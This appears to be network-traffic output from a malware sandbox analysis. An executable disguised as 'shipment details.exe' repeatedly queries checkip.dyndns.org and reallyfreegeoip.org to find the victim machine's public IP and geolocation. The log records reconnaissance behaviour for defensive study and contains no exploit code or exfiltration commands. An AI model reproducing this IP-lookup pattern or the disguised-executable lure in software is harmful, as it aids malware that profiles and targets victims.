                                                                              X-Request-ID: ff2e1fba6adea1b5328feec3fc4b457a
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549710158.101.44.242804788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 18:21:08.103815079 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 8, 2024 18:21:08.685745001 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:08 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 963db384dd09f8e74b024be4b07fc351
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.549713158.101.44.242804788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 18:21:09.614213943 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 8, 2024 18:21:10.195403099 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:10 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: a3dcdf443f0ade99cc1abe5f4562aa23
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.549716158.101.44.242804788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 18:21:10.851270914 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 8, 2024 18:21:11.464623928 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:11 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: d1168478ea676cb3d87958921e7999b4
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.549718158.101.44.242804788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 18:21:12.118496895 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 8, 2024 18:21:13.705847979 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:13 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 675d8e65517b97c86e9d6f3767a8c238
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.549720158.101.44.242804788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 18:21:14.323060036 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 8, 2024 18:21:14.911712885 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 8a427fe093b97665d596df877499d1e1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 8, 2024 18:21:16.031490088 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 8a427fe093b97665d596df877499d1e1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 8, 2024 18:21:16.032113075 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 8a427fe093b97665d596df877499d1e1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 8, 2024 18:21:16.034037113 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 8a427fe093b97665d596df877499d1e1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.549722158.101.44.242804788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 18:21:16.190490007 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 8, 2024 18:21:17.751296043 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:17 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 24fa597a7e93f8bdc7ad8f9815989ff8
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.549724158.101.44.242804788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 18:21:18.403886080 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 8, 2024 18:21:19.013358116 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:18 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: d2931671faadc792fbccca8f8f0ba783
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549707188.114.97.34434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:06 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-08 16:21:06 UTC680INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:06 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 70798
                                                                              Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pspgq9GLrceOySZs3Dd%2FT9U%2FMYNUxTKif13XxY38DN97PrXxBbY81%2Bm97y9hHdCB3bJbWV%2F1i2qwaXUaswcQrrjdp%2Ft2AFr2qnucYDRkCnY11IfbPFIbTIb69vtRdLhvJV8ypDpW"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf77649ff0b1879-EWR
                                                                              2024-10-08 16:21:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-08 16:21:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549709188.114.97.34434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:07 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-08 16:21:08 UTC678INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:08 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 70800
                                                                              Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xL3qUzP94h2F6Jonl4urnx0%2B18ncIC10KqQ0PbZYx9I63qHN%2FLgQnL7jq11PgPfLco7Tg9cZQfVVuceMVMrpFBQQ6Ll7KbvmbBDkQQkRhU0v5gl9pO%2BflmVtYhIoSSS2BRGM%2FOI2"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf776553fde17a5-EWR
                                                                              2024-10-08 16:21:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-08 16:21:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.549711188.114.97.34434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:09 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-08 16:21:09 UTC678INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:09 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 70801
                                                                              Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6IKiQA0%2BIs7%2FT7zV3chR9T%2F9CjSdPVirxTL15e9yKHdORH5zNl7AGRZf8NWMITKxVYj3TtKBA29FsViDFvmxN%2FJEDvnCHhnFhHz8Sbk01H9RCfJ2B8ZWsMCjB7JI483gCzfx5P7B"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf7765d0c930f5d-EWR
                                                                              2024-10-08 16:21:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-08 16:21:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.549715188.114.97.34434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:10 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-08 16:21:10 UTC676INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:10 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 70802
                                                                              Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PVKOcI%2F7qSfhZEgs507D40KfLonzdl75z2UYg6niN6R03aX4gzejoklOBqRCU74Z2TOOTq3aXNA%2FJblwrfcjfhRM3XPNZSXmhssddAjYTKSU%2BKYiC29t9IyotzSjI7PUk4WyNqQj"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf776664a2d42f1-EWR
                                                                              2024-10-08 16:21:10 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-08 16:21:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.549717188.114.97.34434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:11 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-08 16:21:12 UTC676INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:12 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 70804
                                                                              Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBnpYAA1Xsg%2FmAoIDH5cqjReNyeZNBvqeeyjgYlbGwb17%2F%2BSaNDiT4i3G9lPmTzp0VCdKOkWRe0akMfdp7Tu03kypQLbetHr3OttfKpYBPS01qrYBVRGLr71MFUNT6JF0J097Ty2"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cf7766e4c804345-EWR
                                                                              2024-10-08 16:21:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-08 16:21:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.549719188.114.97.34434788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-08 16:21:14 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-08 16:21:14 UTC676INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:14 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 70806
                                                                              Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
